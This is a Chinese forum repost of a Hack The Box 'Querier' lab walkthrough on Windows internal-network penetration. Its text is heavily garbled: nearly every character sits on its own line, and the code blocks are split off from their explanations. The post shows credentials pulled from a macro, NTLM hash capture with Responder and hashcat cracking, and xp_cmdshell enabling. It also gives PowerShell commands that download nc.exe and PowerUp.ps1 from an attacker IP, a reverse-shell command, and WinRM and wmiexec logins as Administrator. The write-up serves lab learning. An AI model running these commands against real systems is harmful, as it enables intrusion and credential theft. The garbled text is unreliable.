论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
渗透测试
[27283] 2021-07-05_从HTB-Querier靶场看内网渗透
文档创建者:
s7ckTeam
浏览次数:
3
最后更新:
2025-01-19
渗透测试
3 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-58
6万
主题
-6万
回帖
-58
积分
管理员
积分
-58
发消息
2021-07-05_从HTB-Querier靶场看内网渗透
从
H
T
B
-
Q
u
e
r
i
e
r
靶
场
看
内
网
渗
透
原
创
徐
哥
M
s
0
8
0
6
7
安
全
实
验
室
2
0
2
1
-
0
7
-
0
5
文
章
来
源
|
文
章
来
源
|
M
S
0
8
0
6
7
内
网
安
全
知
识
内
网
安
全
知
识
星
球
星
球
本
文
作
者
:
阿
青
阿
青
(
M
s
0
8
0
6
7
内
网
安
全
小
组
成
员
)
q
u
e
r
i
e
r
作
为
h
t
b
中
的
一
个
靶
标
环
境
,
其
中
涉
及
的
些
基
础
知
识
和
工
具
应
用
值
得
学
习
,
对
该
靶
标
的
渗
透
流
程
如
图
所
示
:
图
一
整
体
流
程
目
标
I
P
:
1
0
.
1
0
.
1
0
.
1
2
5
本
机
I
P
:
1
0
.
1
0
.
1
4
.
6
需
要
的
工
具
需
要
的
工
具
1
.
s
m
b
c
l
i
e
n
t
2
.
r
e
s
p
o
n
d
e
r
3
.
n
c
4
.
p
o
w
e
r
u
p
.
p
s
1
5
.
n
m
a
p
0
x
0
1
第
一
阶
段
:
从
信
息
收
集
到
连
接
数
据
库
第
一
阶
段
:
从
信
息
收
集
到
连
接
数
据
库
通
过
连
接
文
件
共
享
服
务
,
可
以
下
载
一
个
名
为
"
C
u
r
r
e
n
c
y
V
o
l
u
m
e
R
e
p
o
r
t
.
x
l
s
m
"
的
文
件
。
在
L
i
n
u
x
下
可
以
通
过
s
t
r
i
n
g
s
和
b
i
n
w
a
l
k
来
查
看
文
件
内
容
,
这
里
是
通
过
`
b
i
n
w
a
l
k
-
e
`
命
令
解
压
了
x
l
s
m
文
件
,
并
用
s
t
r
i
n
g
s
命
令
查
看
v
b
a
P
r
o
j
e
c
t
.
b
i
n
中
存
储
的
宏
。
#
n
m
a
p
-
s
C
-
s
V
-
p
-
1
0
.
1
0
.
1
0
.
1
2
5
-
o
A
q
u
e
r
i
e
r
S
t
a
r
t
i
n
g
N
m
a
p
7
.
7
0
(
h
t
t
p
s
:
/
/
n
m
a
p
.
o
r
g
)
a
t
2
0
1
9
-
0
2
-
1
6
0
0
:
5
6
E
S
T
N
m
a
p
s
c
a
n
r
e
p
o
r
t
f
o
r
q
u
e
r
i
e
r
.
h
t
b
(
1
0
.
1
0
.
1
0
.
1
2
5
)
H
o
s
t
i
s
u
p
(
0
.
0
1
3
s
l
a
t
e
n
c
y
)
.
N
o
t
s
h
o
w
n
:
6
5
5
2
1
c
l
o
s
e
d
p
o
r
t
s
P
O
R
T
S
T
A
T
E
S
E
R
V
I
C
E
V
E
R
S
I
O
N
1
3
5
/
t
c
p
o
p
e
n
m
s
r
p
c
M
i
c
r
o
s
o
f
t
W
i
n
d
o
w
s
R
P
C
1
3
9
/
t
c
p
o
p
e
n
n
e
t
b
i
o
s
-
s
s
n
M
i
c
r
o
s
o
f
t
W
i
n
d
o
w
s
n
e
t
b
i
o
s
-
s
s
n
4
4
5
/
t
c
p
o
p
e
n
m
i
c
r
o
s
o
f
t
-
d
s
?
1
4
3
3
/
t
c
p
o
p
e
n
m
s
-
s
q
l
-
s
M
i
c
r
o
s
o
f
t
S
Q
L
S
e
r
v
e
r
1
4
.
0
0
.
1
0
0
0
.
0
0
|
m
s
-
s
q
l
-
n
t
l
m
-
i
n
f
o
:
s
m
b
c
l
i
e
n
t
-
U
Q
U
E
R
I
E
R
/
i
n
v
a
l
i
d
/
/
1
0
.
1
0
.
1
0
.
1
2
5
/
R
e
p
o
r
t
s
s
m
b
:
>
g
e
t
"
C
u
r
r
e
n
c
y
V
o
l
u
m
e
R
e
p
o
r
t
.
x
l
s
m
"
#
s
t
r
i
n
g
s
v
b
a
P
r
o
j
e
c
t
.
b
i
n
m
a
c
r
o
t
o
p
u
l
l
d
a
t
a
f
o
r
c
l
i
e
n
t
v
o
l
u
m
e
r
e
p
o
r
t
s
n
.
C
o
n
n
]
O
p
e
n
r
v
e
r
=
<
S
E
L
E
C
T
*
F
R
O
M
v
o
l
u
m
e
;
在
w
i
n
d
o
w
s
下
直
接
打
开
宏
编
辑
器
,
如
图
图
二
宏
信
息
得
到
s
q
l
-
s
e
r
v
e
r
连
接
信
息
:
用
户
名
:
r
e
p
o
r
t
i
n
g
密
码
:
P
c
w
T
W
T
H
R
w
r
y
j
c
$
c
6
使
用
m
s
s
q
l
c
l
i
e
n
t
连
接
数
据
库
0
x
0
2
第
二
阶
段
:
从
数
据
库
到
命
令
执
行
第
二
阶
段
:
从
数
据
库
到
命
令
执
行
抓
取
抓
取
h
a
s
h
请
求
请
求
连
接
数
据
库
后
,
发
现
没
有
权
限
执
行
命
令
。
这
里
利
用
x
p
_
d
i
r
t
r
e
e
去
发
送
一
个
目
录
请
求
,
并
利
用
r
e
s
p
o
n
d
e
r
开
启
一
个
s
m
b
s
e
r
v
e
r
认
证
服
务
来
抓
取
h
a
s
h
信
息
。
发
送
一
次
s
m
b
认
证
请
求
图
三
x
p
_
d
i
r
t
r
e
e
h
a
s
h
抓
取
结
果
w
o
r
d
>
M
s
g
B
o
x
"
c
o
n
n
e
c
t
i
o
n
s
u
c
c
e
s
s
f
u
l
"
S
e
t
r
s
=
c
o
n
n
.
E
x
e
c
u
t
e
(
"
S
E
L
E
C
T
*
@
@
v
e
r
s
i
o
n
;
"
)
D
r
i
v
e
r
=
{
S
Q
L
S
e
r
v
e
r
}
;
S
e
r
v
e
r
=
Q
U
E
R
I
E
R
;
T
r
u
s
t
e
d
_
C
o
n
n
e
c
t
i
o
n
=
n
o
;
D
a
t
a
b
a
s
e
=
v
o
l
u
m
e
;
U
i
d
=
r
e
p
o
r
t
i
n
g
;
P
w
d
=
P
c
w
T
W
T
H
R
w
r
y
j
c
$
c
6
m
s
s
q
l
c
l
i
e
n
t
.
p
y
-
w
i
n
d
o
w
s
-
a
u
t
h
q
u
e
r
i
e
r
/
r
e
p
o
r
t
i
n
g
:
P
c
w
T
W
T
H
R
w
r
y
j
c
$
c
6
@
$
T
A
R
G
E
T
_
I
P
#
开
启
r
e
s
p
o
n
d
e
r
r
e
s
p
o
n
d
e
r
-
I
e
t
h
0
-
w
r
f
破
解
破
解
h
a
s
h
利
用
h
a
s
h
c
a
t
破
解
抓
到
的
h
a
s
h
可
以
利
用
h
a
s
h
c
a
t
-
-
e
x
a
m
p
l
e
-
h
a
s
h
e
s
|
|
l
e
s
s
来
方
便
地
查
看
相
关
加
密
方
式
破
解
结
果
:
用
户
名
:
m
s
s
q
l
-
s
v
c
口
令
:
c
o
r
p
o
r
a
t
e
5
6
8
使
用
使
用
x
p
_
c
m
d
s
h
e
l
l
执
行
命
令
执
行
命
令
开
启
c
m
d
s
h
e
l
l
上
传
n
c
并
反
连
执
行
命
令
成
功
图
四
反
连
0
x
0
3
第
三
阶
段
第
三
阶
段
:
a
d
m
i
n
提
权
提
权
利
用
P
o
w
e
r
U
p
.
p
s
1
脚
本
收
集
主
机
信
息
P
o
w
e
r
u
p
是
本
地
特
权
提
升
的
一
些
调
用
方
法
,
功
能
相
当
强
大
,
拥
有
众
多
实
用
的
脚
本
来
帮
助
我
们
寻
找
目
标
主
机
W
i
n
d
o
w
s
服
务
漏
洞
进
行
提
权
,
也
是
P
o
w
e
r
S
h
e
l
l
E
m
p
i
r
e
和
P
o
w
e
r
S
p
l
o
i
t
的
一
部
分
。
参
考
h
t
t
p
s
:
/
/
b
l
o
g
.
c
s
d
n
.
n
e
t
/
l
1
0
2
8
3
8
6
8
0
4
/
a
r
t
i
c
l
e
/
d
e
t
a
i
l
s
/
8
6
0
8
9
5
7
4
/
利
用
w
i
n
r
m
接
口
执
行
命
令
n
m
a
p
扫
描
时
,
目
标
开
放
了
5
9
8
5
端
口
h
a
s
h
c
a
t
-
m
5
6
0
0
.
/
t
e
s
t
.
n
l
t
m
v
2
~
/
h
a
c
k
t
o
o
l
s
/
w
o
r
d
d
i
c
/
r
o
c
k
y
o
u
.
t
x
t
-
-
f
o
r
c
e
M
S
S
Q
L
-
S
V
C
:
:
Q
U
E
R
I
E
R
:
7
8
0
8
a
0
7
0
c
1
9
0
1
1
0
d
:
0
e
c
f
a
9
2
9
a
b
2
6
1
b
7
2
7
2
5
3
d
f
8
4
a
f
7
c
f
1
f
2
:
0
1
0
1
0
0
0
0
0
0
0
0
0
0
0
0
c
0
6
5
3
1
5
0
d
e
0
9
d
2
0
1
2
8
6
2
4
b
d
8
2
1
6
6
7
1
3
1
0
0
0
0
0
0
0
0
0
2
0
0
0
8
0
0
5
3
0
0
4
d
0
0
4
2
0
0
3
3
0
0
0
1
0
0
1
e
0
0
5
7
0
0
4
9
0
0
4
e
0
0
2
d
0
0
5
0
0
0
5
2
0
0
4
8
0
0
3
4
0
0
3
9
0
0
3
2
0
0
5
2
0
0
5
1
0
0
4
1
0
0
4
6
0
0
5
6
0
0
0
4
0
0
1
4
0
0
5
3
0
0
4
d
0
0
4
2
0
0
3
3
0
0
2
e
0
0
6
c
0
0
6
f
0
0
6
3
0
0
6
1
0
0
6
c
0
0
0
3
0
0
3
4
0
0
5
7
0
0
4
9
0
0
4
e
0
0
2
d
0
0
5
0
0
0
5
2
0
0
4
8
0
0
3
4
0
0
3
9
0
0
3
2
0
0
5
2
0
0
5
1
0
0
4
1
0
0
4
6
0
0
5
6
0
0
2
e
0
0
5
3
0
0
4
d
0
0
4
2
0
0
3
3
0
0
2
e
0
0
6
c
0
0
6
f
0
0
6
3
0
0
6
1
0
0
6
c
0
0
0
5
0
0
1
4
0
0
5
3
0
0
4
d
0
0
4
2
0
0
3
3
0
0
2
e
0
0
6
c
0
0
6
f
0
0
6
3
0
0
6
1
0
0
6
c
0
0
0
7
0
0
0
8
0
0
c
0
6
5
3
1
5
0
d
e
0
9
d
2
0
1
0
6
0
0
0
4
0
0
0
2
0
0
0
0
0
0
0
8
0
0
3
0
0
0
3
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
3
0
0
0
0
0
9
8
2
8
a
f
2
2
4
f
4
4
d
2
d
8
d
d
b
8
f
0
e
4
8
8
a
9
2
d
1
b
f
f
f
6
2
3
c
7
f
b
3
b
5
4
4
8
e
d
2
2
e
9
6
f
6
8
4
2
e
8
9
b
0
a
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
9
0
0
1
e
0
0
6
3
0
0
6
9
0
0
6
6
0
0
7
3
0
0
2
f
0
0
3
1
0
0
3
0
0
0
2
e
0
0
3
1
0
0
3
0
0
0
2
e
0
0
3
1
0
0
3
4
0
0
2
e
0
0
3
6
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
:
c
o
r
p
o
r
a
t
e
5
6
8
S
Q
L
>
E
X
E
C
s
p
_
c
o
n
f
i
g
u
r
e
'
s
h
o
w
a
d
v
a
n
c
e
d
o
p
t
i
o
n
s
'
,
1
;
[
*
]
I
N
F
O
(
Q
U
E
R
I
E
R
)
:
L
i
n
e
1
8
5
:
C
o
n
f
i
g
u
r
a
t
i
o
n
o
p
t
i
o
n
'
s
h
o
w
a
d
v
a
n
c
e
d
o
p
t
i
o
n
s
'
c
h
a
n
g
e
d
f
r
o
m
1
t
o
1
.
R
u
n
t
h
e
R
E
C
O
N
F
I
G
U
R
E
s
t
a
t
e
m
e
n
t
t
o
i
n
s
t
a
l
l
.
S
Q
L
>
R
E
C
O
N
F
I
G
U
R
E
;
S
Q
L
>
E
X
E
C
s
p
_
c
o
n
f
i
g
u
r
e
'
x
p
_
c
m
d
s
h
e
l
l
'
,
1
;
[
*
]
I
N
F
O
(
Q
U
E
R
I
E
R
)
:
L
i
n
e
1
8
5
:
C
o
n
f
i
g
u
r
a
t
i
o
n
o
p
t
i
o
n
'
x
p
_
c
m
d
s
h
e
l
l
'
c
h
a
n
g
e
d
f
r
o
m
1
t
o
1
.
R
u
n
t
h
e
R
E
C
O
N
F
I
G
U
R
E
s
t
a
t
e
m
e
n
t
t
o
i
n
s
t
a
l
l
.
S
Q
L
>
R
E
C
O
N
F
I
G
U
R
E
;
S
Q
L
>
x
p
_
c
m
d
s
h
e
l
l
"
d
i
r
c
:
u
s
e
r
s
"
o
u
t
p
u
t
.
.
.
S
Q
L
>
x
p
_
c
m
d
s
h
e
l
l
"
p
o
w
e
r
s
h
e
l
l
-
c
o
m
m
a
n
d
I
n
v
o
k
e
-
W
e
b
R
e
q
u
e
s
t
-
U
r
i
h
t
t
p
:
/
/
1
0
.
1
0
.
1
4
.
2
3
/
n
c
.
e
x
e
-
O
u
t
F
i
l
e
c
:
p
r
o
g
r
a
m
d
a
t
a
n
c
.
e
x
e
"
S
Q
L
>
x
p
_
c
m
d
s
h
e
l
l
"
c
:
p
r
o
g
r
a
m
d
a
t
a
n
c
.
e
x
e
1
0
.
1
0
.
1
4
.
6
1
2
3
4
-
e
c
:
w
i
n
d
o
w
s
s
y
s
t
e
m
3
2
c
m
d
.
e
x
e
"
#
n
c
监
听
n
c
-
l
v
n
p
1
2
3
4
P
S
C
:
W
i
n
d
o
w
s
s
y
s
t
e
m
3
2
>
I
E
X
(
N
e
w
-
O
b
j
e
c
t
N
e
t
.
W
e
b
c
l
i
e
n
t
)
.
d
o
w
n
l
o
a
d
s
t
r
i
n
g
(
"
h
t
t
p
:
/
/
1
0
.
1
0
.
1
4
.
6
/
P
o
w
e
r
U
p
.
p
s
1
"
)
P
S
C
:
W
i
n
d
o
w
s
s
y
s
t
e
m
3
2
>
i
n
v
o
k
e
-
a
l
l
c
h
e
c
k
s
[
*
]
C
h
e
c
k
i
n
g
f
o
r
c
a
c
h
e
d
G
r
o
u
p
P
o
l
i
c
y
P
r
e
f
e
r
e
n
c
e
s
.
x
m
l
f
i
l
e
s
.
.
.
.
C
h
a
n
g
e
d
:
{
2
0
2
1
-
0
3
-
1
4
1
4
:
1
2
:
4
8
}
U
s
e
r
N
a
m
e
s
:
{
A
d
m
i
n
i
s
t
r
a
t
o
r
}
N
e
w
N
a
m
e
:
[
B
L
A
N
K
]
P
a
s
s
w
o
r
d
s
:
{
M
y
U
n
c
l
e
s
A
r
e
M
a
r
i
o
A
n
d
L
u
i
g
i
!
!
1
!
}
F
i
l
e
:
C
:
P
r
o
g
r
a
m
D
a
t
a
M
i
c
r
o
s
o
f
t
G
r
o
u
p
P
o
l
i
c
y
H
i
s
t
o
r
y
{
3
1
B
2
F
3
4
0
-
0
1
6
D
-
1
1
D
2
-
9
4
5
F
-
0
0
C
0
4
F
B
9
8
4
F
9
}
M
a
c
h
i
n
e
P
r
e
f
e
r
e
n
c
e
s
G
r
o
u
p
s
G
r
o
u
p
s
.
x
m
l
C
:
W
i
n
d
o
w
s
s
y
s
t
e
m
3
2
>
p
o
w
e
r
s
h
e
l
l
r
e
q
u
i
r
e
'
w
i
n
r
m
'
#
A
u
t
h
o
r
:
A
l
a
m
o
t
c
o
n
n
=
W
i
n
R
M
:
:
C
o
n
n
e
c
t
i
o
n
.
n
e
w
(
e
n
d
p
o
i
n
t
:
'
h
t
t
p
:
/
/
1
0
.
1
0
.
1
0
.
1
2
5
:
5
9
8
5
/
w
s
m
a
n
'
,
u
s
e
r
:
'
q
u
e
r
i
e
r
a
d
m
i
n
i
s
t
r
a
t
o
r
'
,
p
a
s
s
w
o
r
d
:
'
M
y
U
n
c
l
e
s
A
r
e
M
a
r
i
o
A
n
d
L
u
i
g
i
!
!
1
!
'
,
)
利
用
w
m
i
e
x
e
c
连
接
0
x
0
4
总
结
总
结
在
对
整
个
靶
场
的
攻
击
中
,
前
期
的
信
息
收
集
很
重
要
,
比
如
通
过
n
m
a
p
扫
描
的
4
4
5
端
口
发
现
敏
感
文
件
,
而
后
运
用
s
q
l
-
s
e
r
v
e
r
去
实
现
命
令
执
行
,
最
后
通
过
5
9
8
5
端
口
执
行
命
令
,
同
时
,
发
现
s
q
l
_
s
e
r
v
e
r
无
法
执
行
命
令
时
,
也
可
以
尝
试
运
用
x
p
_
d
i
r
t
r
e
e
+
r
e
s
p
o
n
d
e
r
的
方
式
进
行
突
破
。
扫
描
下
方
二
维
码
加
入
星
球
学
习
扫
描
下
方
二
维
码
加
入
星
球
学
习
加
入
后
邀
请
你
进
入
内
部
微
信
群
,
内
部
微
信
群
永
久
有
效
!
加
入
后
邀
请
你
进
入
内
部
微
信
群
,
内
部
微
信
群
永
久
有
效
!
和
和
4
0
0
0
+
位
同
学
一
起
加
入
星
球
学
习
位
同
学
一
起
加
入
星
球
学
习
c
o
m
m
a
n
d
=
"
"
c
o
n
n
.
s
h
e
l
l
(
:
p
o
w
e
r
s
h
e
l
l
)
d
o
|
s
h
e
l
l
|
u
n
t
i
l
c
o
m
m
a
n
d
=
=
"
e
x
i
t
n
"
d
o
o
u
t
p
u
t
=
s
h
e
l
l
.
r
u
n
(
"
-
j
o
i
n
(
$
i
d
,
'
P
S
'
,
$
(
w
h
o
a
m
i
)
,
'
@
'
,
$
e
n
v
:
c
o
m
p
u
t
e
r
n
a
m
e
,
'
'
,
$
(
(
g
i
$
p
w
d
)
.
N
a
m
e
)
,
'
>
'
)
"
)
p
r
i
n
t
(
o
u
t
p
u
t
.
o
u
t
p
u
t
.
c
h
o
m
p
)
c
o
m
m
a
n
d
=
g
e
t
s
o
u
t
p
u
t
=
s
h
e
l
l
.
r
u
n
(
c
o
m
m
a
n
d
)
d
o
|
s
t
d
o
u
t
,
s
t
d
e
r
r
|
S
T
D
O
U
T
.
p
r
i
n
t
s
t
d
o
u
t
S
T
D
E
R
R
.
p
r
i
n
t
s
t
d
e
r
r
e
n
d
e
n
d
p
u
t
s
"
E
x
i
t
i
n
g
w
i
t
h
c
o
d
e
#
{
o
u
t
p
u
t
.
e
x
i
t
c
o
d
e
}
"
e
n
d
#
r
u
b
y
q
u
e
r
i
e
r
.
r
b
.
.
.
w
m
i
e
x
e
c
.
p
y
A
d
m
i
n
i
s
t
r
a
t
o
r
:
M
y
U
n
c
l
e
s
A
r
e
M
a
r
i
o
A
n
d
L
u
i
g
i
!
!
1
!
@
1
0
.
1
0
.
1
0
.
1
2
5
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
浏览过的版块
云安全
golang
发表
渗透测试